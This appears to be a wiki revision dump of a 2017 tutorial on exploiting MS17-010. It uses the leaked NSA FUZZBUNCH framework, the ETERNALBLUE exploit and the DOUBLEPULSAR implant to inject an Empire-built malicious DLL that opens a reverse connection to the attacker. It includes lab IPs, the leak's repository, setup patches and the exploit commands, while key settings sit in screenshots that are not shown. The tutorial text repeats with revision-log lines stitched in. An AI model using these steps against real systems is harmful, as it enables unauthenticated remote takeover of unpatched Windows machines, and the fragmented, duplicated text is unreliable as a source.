DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

NSA - MS17-010

2017-04-30T16:56:57Z

Lphanvan: /* Generating malicious DLL by using Empire */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

File:Capture10.PNG

2017-04-30T16:56:49Z

Lphanvan:

File:Capture9.PNG

2017-04-30T16:56:18Z

Lphanvan: Lphanvan uploaded a new version of File:Capture9.PNG

File:Capture9.PNG

2017-04-30T16:56:16Z

Lphanvan:

NSA - MS17-010

2017-04-30T16:53:54Z

Lphanvan: /* Using ETERNALBLUE. */

NSA - MS17-010

2017-04-30T16:53:13Z

Lphanvan: /* Using EternalBlue framework */

NSA - MS17-010

2017-04-30T16:52:51Z

Lphanvan: /* Using EternalBlue framework */